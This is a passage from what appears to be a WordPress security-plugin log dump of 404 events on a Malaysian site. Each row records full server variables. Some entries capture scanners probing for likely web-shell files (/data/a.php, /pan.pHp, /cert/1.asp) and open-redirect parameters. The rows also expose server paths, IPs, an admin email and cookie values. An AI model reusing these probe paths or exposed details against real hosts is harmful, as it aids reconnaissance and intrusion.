00:20:31',35035992,36843872,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27796,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"02FA8CC1-D5FC-4868-A918-F62755D04C4E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ54Y4W0BuA@f-VjsznFPwAAAEA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"50689\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ54Y4W0BuA@f-VjsznFPwAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570666595.1689\";s:12:\"REQUEST_TIME\";s:10:\"1570666595\";}}','notice','2019-10-10 00:16:37','2019-10-10 00:16:35',35794184,37594720,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27797,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:101:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/B08C390C\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:99:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"52998\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ55SeBT1onqG4TOWhk8lQAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570666825.5524\";s:12:\"REQUEST_TIME\";s:10:\"1570666825\";}}','notice','2019-10-10 00:20:27','2019-10-10 00:20:25',35034504,36841608,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27795,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/logitech/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"65-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"65-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ5w94W0BuA@f-VjsznAsAAAAAE\";s:12:\"REDIRECT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60345\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:10:\"SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ5w94W0BuA@f-VjsznAsAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570664695.7928\";s:12:\"REQUEST_TIME\";s:10:\"1570664695\";}}','notice','2019-10-09 23:44:57','2019-10-09 23:44:56',35053344,36857448,'https://bintara.com.my/logitech/favicon.ico',1,0,'60.50.71.184'),(27794,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/data/a.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=90f07e48832b77be6c7654b55fd6bf3f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:33:\"http://bintara.com.my//data/a.php\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/data/a.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/data/a.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ5IcayUrY9zjNB4MhenvwAAAZY\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/data/a.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/data/a.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ5IcayUrY9zjNB4MhenvwAAAZY\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/data/a.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/data/a.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ5IcayUrY9zjNB4MhenvwAAAZY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"180.113.67.161\";s:11:\"REMOTE_PORT\";s:5:\"60898\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/data/a.php\";s:10:\"SCRIPT_URL\";s:11:\"/data/a.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ5IcayUrY9zjNB4MhenvwAAAZY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570654321.8307\";s:12:\"REQUEST_TIME\";s:10:\"1570654321\";}}','notice','2019-10-09 20:52:03','2019-10-09 20:52:02',35060784,36869272,'https://bintara.com.my/data/a.php',1,0,'180.113.67.161'),(27792,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"//pan.pHp\";s:14:\"CONTENT_LENGTH\";s:3:\"349\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:30:\"http://bintara.com.my//pan.pHp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"http://bintara.com.my/pan.pHp\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/pan.pHp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ5IQ4W0BuA@f-VjszmvfAAAAEA\";s:12:\"REDIRECT_URL\";s:8:\"/pan.pHp\";s:11:\"REMOTE_ADDR\";s:14:\"180.113.67.161\";s:11:\"REMOTE_PORT\";s:5:\"58176\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"http://bintara.com.my/pan.pHp\";s:10:\"SCRIPT_URL\";s:8:\"/pan.pHp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ5IQ4W0BuA@f-VjszmvfAAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570654275.9046\";s:12:\"REQUEST_TIME\";s:10:\"1570654275\";}}','notice','2019-10-09 20:51:18','2019-10-09 20:51:16',35924808,37737032,'http://bintara.com.my//pan.pHp',1,0,'180.113.67.161'),(27793,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/cert/1.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=11d658520a2c6b85a0d584d48a70678e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:33:\"http://bintara.com.my//cert/1.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/cert/1.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/cert/1.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ5IWn6YXSDJF91Gv2PnqwAAAAc\";s:12:\"REDIRECT_URL\";s:11:\"/cert/1.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"180.113.67.161\";s:11:\"REMOTE_PORT\";s:5:\"60114\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/cert/1.asp\";s:10:\"SCRIPT_URL\";s:11:\"/cert/1.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ5IWn6YXSDJF91Gv2PnqwAAAAc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570654298.5039\";s:12:\"REQUEST_TIME\";s:10:\"1570654298\";}}','notice','2019-10-09 20:51:40','2019-10-09 20:51:38',35047048,36846904,'https://bintara.com.my/cert/1.asp',1,0,'180.113.67.161'),(27791,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=11&title=XXXXX\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=11&title=XXXXX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.150.134\";s:11:\"REMOTE_PORT\";s:5:\"35006\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ4mkE0uvGE2zB9cwJbmpAAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570645649.7825\";s:12:\"REQUEST_TIME\";s:10:\"1570645649\";}}','notice','2019-10-09 18:28:34','2019-10-09 18:27:30',35519056,37329672,'https://bintara.com.my/?page_id=11&title=XXXXX',1,0,'54.36.150.134'),(27790,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/license.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/license.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ3z@oxV0SvqUWaw3AGx7QAAAVc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/license.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3z@oxV0SvqUWaw3AGx7QAAAVc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"43594\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:10:\"SCRIPT_URL\";s:12:\"/license.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3z@oxV0SvqUWaw3AGx7QAAAVc